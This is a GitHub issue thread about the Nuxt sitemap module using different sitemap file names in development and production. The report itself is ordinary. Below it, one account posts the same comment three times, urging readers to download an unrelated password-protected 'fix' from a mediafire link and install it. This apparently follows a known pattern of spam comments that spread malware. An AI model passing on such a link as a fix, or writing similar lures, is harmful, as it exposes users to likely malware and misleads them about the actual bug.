### ISSUE TITLE
fix: Why is my sitemap en-US-sitemap.xml in the development environment and __sitemap__/en.xml in the production environment?

### ISSUE THREAD

**Issue by WooHoo-Wu** [nuxt-modules/sitemap#348]
### 🐛 The bug

This is the development environment：
<img width="641" alt="image" src="https://github.com/user-attachments/assets/bb1878ab-54ba-4207-bcdf-56ffa49a08a9">
This is the production environment：
<img width="781" alt="image" src="https://github.com/user-attachments/assets/0d450390-2404-49ac-986f-57c9bfe6eea9">

### 🛠️ To reproduce

https://nuxtseo.com/sitemap/getting-started/stackblitz

### 🌈 Expected behavior

locales:
![image](https://github.com/user-attachments/assets/14a658ee-abd3-4584-bd48-fc56af632d3a)
![image](https://github.com/user-attachments/assets/b2bf39dd-abcd-4dad-be0f-6df03ac0b1ac)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
